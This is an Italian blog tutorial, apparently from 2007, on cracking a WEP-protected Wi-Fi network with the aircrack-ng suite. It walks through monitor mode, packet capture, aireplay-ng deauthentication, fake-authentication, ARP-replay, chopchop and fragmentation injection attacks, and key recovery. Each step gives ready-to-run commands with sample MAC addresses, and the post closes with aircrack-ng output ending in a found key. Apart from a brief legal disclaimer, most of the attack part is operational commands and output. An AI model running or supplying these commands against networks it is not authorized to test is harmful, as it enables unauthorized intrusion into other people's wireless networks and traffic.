Aricrack ng

 

Aricrack ng

Questa guida è solo a scopo dimostrativo: se volete fare il cracking di una rete wifi protetta fatelo sulla vostra in quanto la legge vieta espressamente la forzatura di sistemi altrui, comprese le reti.

Le informazioni di seguito riportate sono prese da “http://www.aircrack-ng.org/doku.php” e testate su SUSE 10.1 e Knoppix 5.0.1 utilizzando un Asus Centrino, un Macbook 2.16 ed un modem Alice gate2 Plus Wi-Fi.

Introduzione

Aircrack è una suite composta da diversi tools:

“Airodump” per la cattura di pacchetti 802.11 (sniffer)

“Aireplay” per il packet injection

“Aircrack” per il cracking di chiavi WEP e WPA-PSK

“Airdecap” decifra file catturati WEP/WPA

Nozioni di Base

I partecipanti:

Access Point (AP) : è l’access point di cui vogliamo conoscere la chiave

Target Client (TC) : è il computer che dialoga con l’access point.

Sniffing Client (SC) : è il computer che si occuperà di sniffare il traffico della rete (passive mode).

Attacking Client (AC) : è un client che si occuperà di stimolare la generazione di idonei pacchetti (IVs) (active mode)

Installazione

Per prima cosa installiamo aircrack

apriamo una shell e da amministratori digitiamo:

Make

Make install

e lavoriamo nella relativa cartella.

Configurazione

Digitiamo

iwconfig

e vediamo quale interfaccia stiamo usando (nel mio caso eth2).

Avviamo Airmon-ng:

airmon-ng <start|stop> <interface> [channel]

dove

·<start|stop> avvia o ferma l’interfaccia

·<interface> specifica l’interfaccia (eth0, wifi0, wlan0)

·[channel] indica il canale (opzionale)


esempio:

arimon-ng start eth2

otteniamo per il mio Asus:

Interface Chipset Driver

eth2 Centrino 2 ipw2200 (monitor mode enable)

Scansione

Lanciamo da terminale il seguente comando per abilitare la modalità monitor della scheda wireless:

iwconfig eth2 mode monitor

poi avviamo lo sniffer:

airodump-ng <options> <interfaccia>

dove:

Options:

–ivs: Save only captured IVs. Short form -i.

–gpsd: Use GPSd.Short forum -g.

–write<prefix> : Dump file prefix.Short form -w.

–beacons: Record all beacons in dump file. Short form -e.

–netmask <netmask> : Filter APs by mask. Short form -m.

–bssid<bssid> : Filter APs by BSSID.Short form -d.

–encrypt<suite> : Filter APs by cypher suite.Short form -t

-a: Filter unassociated clients

Appare ad esempio:

CH9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WEP handshake: 00:19::3E:48:52:B5

BSSIDPWR RXQBeacons#Data, #/sCHMBENCCIPHER AUTH ESSID

00:19::3E:48:52:B532 100752732954 WEP WEP Alice

BSSIDSTATIONPWRLostPacketsProbes

00:19:3E:48:52:B500:0F:B5:FD:FB:C235099 Alice

Otteniamo le seguenti informazioni:

·BSSID dell’AP (indirizzo MAC)

 

·ESSID dell’AP (nome della rete)

 

·Channel (canale)

ed il tipo di chiave, nel nostro caso WEP.

Sniffing

Ora fermiamo arodump (ctrl +C) e lanciamo nuovamente airodump-ng con questi paramentri:

airodump-ng -c <canale> -w <file.cap> <interfaccia>

esempio

“airodump-ng -c 1 -b 00:19:3E:48:52:B5 -w test eth2”

 

In questo limitiamo la ricerca al solo canale interessato e salviamo le informazioni catturate su un file “test”. Per il crack di una rete abbiamo bisogno dai 50.000 a 1.000.000 ivs circa per una chiave Wep a 128-bit, ci vorrebbero forse mesi, allora dobbiamo stimolare la produzione di IVs con vari tipi di attacco!

I tipi di attacco

·Attack 0: Deauthentication

·Attack 1: Fake authentication

·Attack 2: Interactive packet replay

·Attack 3: ARP request replay attack

·Attack 4: KoreK chopchop attack

·Attack 5: Fragmentation attack

·Attack 9: Injection test

Importante

Non tutte le schede Wireless hanno drivers che consentono l’injection.

Airplay-ng supporta l’injection solo su schede Prism2, PrismGT. Atheros, RTL8180/8187, Ralink, Zydas

nel mio caso la scheda interna è del tipo “ipw2200”, pertanto cerco l’ultimo pacht/driver disponibile.

Recupero i driver e li installo:

wget http://superb-west.dl.sourceforge.net/sourceforge/

ieee80211/ieee80211-1.2.17.tar.gz

tar zxvf ieee80211-1.2.17.tar.gz

cd ieee80211-1.2.17

make

make install

modprobe ipw2200 rtap_iface=1

ifconfig rtap0 up

fconfig eth2 up

(i driver ipw2200 per jniect funzionano solo per attacchi 2 e 4 , forse il 3, certamente chi possiede un centrino con la scheda ipw3945 può effettuare l’ jniection installando:

wget http://homepages.tu-darmstadt.de/~p_larbig/
wlan/ipwraw-ng-2.0.0-10072007.tar.bz2
tar -xjf ipwraw-ng*

…install….eccc…

sudo modprobe -r ipw3945sudo modprobe ipwraw
)

Esempi di attacco:

0. Deauthentication

aireplay-ng -0 1 -a 00:19:3E:48:52:B5 -c 00:1B:63:08:B6:40 eth2

1. Fake authentication

aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <MAC TC> <interfaccia>

aireplay-ng -1 6000 -o 1 -q 10 -e Alice -a 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

altro esempio:

“aireplay-ng -1 0 -e Alice-xxxxx -a 00:19:3e:48:52:b5 -h 00:1b:63:08:b6:40 eth2”

 

dove:

·-1 = fake authentication

       ·-o  il ritardo (valore >=0)

·-e “Alice-xxxxx” è il nome del network

·-a 00:19:3e:48:52:b5 è l’ind. MAC dell’AP

·-h 00:1b:63:08:b6:40 è l’ind. MAC del TC

·eth2 è il nome dell’interfaccia

2. Interactive packet replay

aireplay-ng -2 -b 00:19:3E:48:52:B5 -d FF:FF:FF:FF:FF:FF -t 1 eth2

3. ARP Request Replay Attack

aireplay-ng -3 -b <BSSID> – h <AP client> <interface>

aireplay-ng -3 -b <BSSID> – d <MAC di destinazione (falso)> -h <MAC TC> <interface>

aireplay-ng -3 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

4. KoreK chopchop

aireplay-ng -4 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

5. Fragmentation Attack

aireplay-ng -5 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

6. Injection test

aireplay-ng –test <interfaccia>

aireplay-ng -9 eth2

aireplay-ng –test -e Alice -a 00:19:3E:48:52:B5 eth2

 

Cracking

Quando siamo pronti (numero di IVs ottimale raggiunto) digitiamo da un’altra shell:

aircrack-ng <options> <file.cap>

o

aircrack-ng -a 1 – b <mac AP> -n XX nomefile.cap

nel nostro caso:

aircrack-ng -n 64 test-01.cap

o

aircrack-ng -a 1 – b 00:19:3e:48:52:b5 -n 64 test.cap

o

aircrack-ng -f 2 – b 00:19:3e:48:52:b5 -n 64 test.cap

tra le opzioni segnalo:

-n : lunghezza della chiave,

– 64 per 40-bit WEP

– 128 per 104-bit WEP

-a : force attack mode (1=static WEP, 2=WPA/WPA2-PSK)

-b : indirizza il targhet network sull’indirizzo MAC dell’access point)

– f: (2 per 104-bit WEP ; 5 per 40-bit WEP)

un pò di pazienza e se i pacchetti IVs sono sufficienti si ottiene la chiave.

Opening ptw-01.cap

Read 171721 packets.

#BSSIDESSIDEncryption

100:19::3E:48:52:B5 Alice-xxxxxWEP (30680 IVs)

Choosing first network as target.

Aircrack-ng 0.7 r247

[00:00:00] Tested 2 keys (got 13 IVs)

KBdepthbyte(vote)

00/000(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00 ( 0) 00(0)

KEY FOUND! [ 12:34:56:78:90 ]

Probability: 100%

ed il gioco è fatto.

Se la vostra scheda non supporta l’injection, e volete ugualmente testare aircrack potete usare il seguente file:

ptw.cap

relativo ad una chiave a 128-bit WEP, una volta decriptato apparirà il seguente valore:

“1F:1F:1F:1F:1F ”

difatti ricordo che:

WEP – lunghezza chiave Caratteri Ascii Caratteri Hex.

64 bits 5 10

128 bits 13 26

256 bits 29 58

Buon lavoro



Una risposta a “Aricrack ng”

  1. Packet injection con AirPort « Max’s Weblog

    […] procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come […]

Lascia un commento